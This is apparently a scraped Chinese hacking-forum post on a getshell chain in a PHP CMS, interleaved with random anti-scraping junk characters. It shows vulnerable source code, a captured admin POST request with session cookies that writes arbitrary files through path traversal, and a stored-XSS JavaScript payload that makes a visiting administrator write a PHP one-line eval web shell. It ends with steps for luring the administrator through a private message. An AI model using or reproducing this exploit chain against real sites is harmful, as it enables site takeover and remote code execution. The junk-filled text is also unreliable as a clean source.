|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题
* T6 M/ E$ l0 O0 `8 h; ]官网已经修补了,所以重新下了源码1 S, m/ y0 K" d
因为 后台登入 还需要认证码 所以 注入就没看了。/ K( U; A7 j4 f- X" n+ s
存在 xss
8 B; t7 B+ J' V; q: y: |: D漏洞文件 user/member/skin_edit.php0 Y% o9 w, W5 e+ |$ N) w3 K W
本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名: V0 S& M1 d. F) _3 L) S+ A2 N
" k1 c- l- o5 _( F) k
</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>4 ~$ u9 G, F4 x2 Z% b- f, l' {
7 a Y, d+ A" N0 d
</textarea></td></tr>
- I3 B# k( s& L
* V3 f& m- z' V6 b' H& f user/do.php
0 \2 |- O+ Q8 p t5 K2 U$ ?4 \( M0 ]
[1 q3 I$ e! z/ B* U0 Q8 f/ Iif($op=='zl'){ //资料6 Z# F, ^8 t- N( W
" H: i; [% o1 y- t if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email))
& c" j5 P* n% s7 y exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);')); ?& D* G% C. q! M/ i) t
, G& i1 Q% z- `/ e: { $sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',
1 `+ `- |* s7 m
) B w2 [% J2 ?: I; X* e; ~ CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'
0 q/ |. `, r0 i6 b; C( ~' r1 \% Q where CS_Name='".$cscms_name."'";: H/ G" [) _" b5 s% G l
' L1 g# B- N0 Z C7 w8 d* Q
if($db->query($sql)){4 G6 r& P& U9 P1 Y( w# x# m
& ~, q* l7 h# j. _0 h. |( | exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));- T1 h$ m* j( e+ I
* c/ I" g" A* k2 b X( n* |
}else{6 V. _. \! i$ x" j2 v
, B! e4 A5 W- h% g+ K( ^# Q8 b exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));. n4 i2 N0 g3 u( J: d; M6 a
# k+ h9 y/ E+ G0 Y ]) d
}1 T7 n- @5 ?# \( w6 V3 `6 ^
' ^8 B0 }+ T) Z! `
2 l7 \3 y/ d( r, @$ `& ~, [没有 过滤导致xss产生。' l# o+ j* t& A% F' q& C. v
后台 看了下 很奇葩的是可以写任意格式文件。。
* z+ H: B* [, j5 t7 p* }抓包。。
* C8 H* j" H3 o8 D
# ]# y: W+ F$ O- a
- O. J+ z$ _% S- q$ \( }, F7 Z; K本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1
5 l3 y0 ~ Q! T+ z3 p) N
/ d0 }) e! o0 o _Accept: text/html, application/xhtml+xml, */*$ V- x1 p6 h4 L. l. g2 o y
2 q% A& X5 b# p3 Y7 t0 F% ^
Referer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php2 G$ o! D3 G& x
$ ?6 M5 ?3 y# x' L6 |% ^Accept-Language: zh-CN9 z5 I3 i6 v* B9 X+ o7 h
# [5 k) f. W3 R4 Z
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
7 N6 q& X0 @) E
7 @: C! f3 ` \. l* x7 ]: ^: N9 rContent-Type: application/x-www-form-urlencoded
- ^7 ^, w9 t1 S+ S " E2 `/ \" M: W8 P8 m5 T2 F
Accept-Encoding: gzip, deflate1 `: u' h9 r" R- F
; Z; m- Q2 C/ H: }/ yHost: 127.0.0.1: r8 F0 M5 ~0 x2 L8 c. _
9 @: [, n/ g/ S3 v3 `4 X3 q6 ^9 W
Content-Length: 38
F6 X) |$ x' a) `) U : H# o& L9 Y0 F- Z
DNT: 1; i& ]- f2 X3 ]4 q, z m' m: |
b6 `2 K E) ?3 YConnection: Keep-Alive5 V8 g& f4 y4 N h! C9 \7 x* W
$ @2 d1 E) F# G" i- \
Cache-Control: no-cache
; a, n' Q6 j4 z3 Q" u
2 D$ Y; \' S- S' F) }5 xCookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f655946 }" w9 u9 {3 U; k5 [. S8 J& v
1 R9 a' z' @. N0 w$ E4 Q
8 k3 s* A: Z, a* T2 S2 b. C& O
name=aaa.php&content=%3Cs%3E%3Ca%25%3E
. x4 l: T/ l8 M4 y" \, e$ r6 T2 _' t% w; \) E( ?3 X( Y
- J9 `! r9 b6 q; I3 o+ m& ?1 p6 N8 t' x+ b
于是 构造js如下。0 ?& G3 i* x6 f- C
/ a2 O! C6 a* a a* ^' x& g) e; u$ N
本帖隐藏的内容<script>
$ M6 S8 |3 e( Q6 I5 }0 H/ zthisTHost = top.location.hostname;7 T+ x& z: w3 g+ i4 D
3 h' b$ ~9 E1 ]$ E8 r6 Z
thisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";
n( ?% `0 n& B% a
+ M2 N+ f4 X w9 }% x1 _7 \function PostSubmit(url, data, msg) { # |' v* ?9 d/ a; B4 e
var postUrl = url;: ?0 h, m; c5 x; [% Z: z) e2 s
( [% w2 |1 P5 S7 d0 p
var postData = data;
# W9 U7 |6 D: `- ^ var msgData = msg; 5 c$ k7 q: h9 ?& O8 M& U# C3 I# H
var ExportForm = document.createElement("FORM");
& A. A- T' n6 D2 P: V6 K b0 @ document.body.appendChild(ExportForm); + l. ^* d! H, z# @6 i& ?4 x
ExportForm.method = "POST"; 2 Y! _* \0 I2 ^1 J8 H8 r1 c
var newElement = document.createElement("input");
. W- x# ~5 |2 H s, k newElement.setAttribute("name", "name");
3 l5 v! ~/ W. b' J& D newElement.setAttribute("type", "hidden");
/ Q! s0 G- i! {7 L; R# N var newElement2 = document.createElement("input"); . C) D0 _- h( w# P1 I" o: C
newElement2.setAttribute("name", "content"); - X5 f/ e* @0 Q: t2 i6 s8 b7 j
newElement2.setAttribute("type", "hidden"); " ?# [6 Y: p$ ]- D
ExportForm.appendChild(newElement); & E4 ?6 O, R7 Y
ExportForm.appendChild(newElement2); 2 d" o/ l: V( `& B$ C6 ^
newElement.value = postData;
6 H& w: u: _$ T0 x! W. O0 O' u newElement2.value = msgData; # j! _- ^" r, d: h! J. z' M
ExportForm.action = postUrl;
z. i+ P( x4 X; v3 A ExportForm.submit();
0 x* K" S/ l9 p3 L, `- L5 E: M};) u3 P: E# B7 L
@2 h% j7 I1 \6 q
PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");
% ~( r$ t$ c5 [0 Y 2 H, v3 [- f0 |+ u/ z1 i% z& h
</script>) ?' X5 B8 t" l7 K( i
2 M) b! I6 t$ J8 a5 c5 {/ ?
+ K* i0 r4 ]6 t5 @$ K) a+ b- m6 N y/ w
http://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入: @; ]' o# [; s3 d: l
用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)
4 }" ]/ h3 j! S* w) t9 c就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
7 H& Y5 t: L' D( q" l$ S |
|